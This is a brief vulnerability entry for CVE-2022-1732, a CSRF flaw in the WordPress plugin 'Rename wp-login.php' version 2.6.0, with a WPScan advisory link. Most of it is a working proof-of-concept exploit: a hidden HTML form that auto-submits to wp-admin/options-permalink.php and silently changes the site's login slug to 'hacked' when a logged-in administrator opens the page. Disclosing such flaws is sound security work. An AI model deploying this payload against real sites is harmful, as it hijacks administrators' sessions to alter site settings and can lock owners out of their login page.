CVE: CVE-2022-1732

Name: Rename wp-login.php (rename-wp-login)

Version: 2.6.0

Date: 2022-04-25 19:58:43

Advisory: https://wpscan.com/vulnerability/3620a087-032e-4a5f-99c8-f9e7e9c29813

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="rwl_page" value="hacked">
    <input type="text" name="submit" value="Änderungen speichern">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>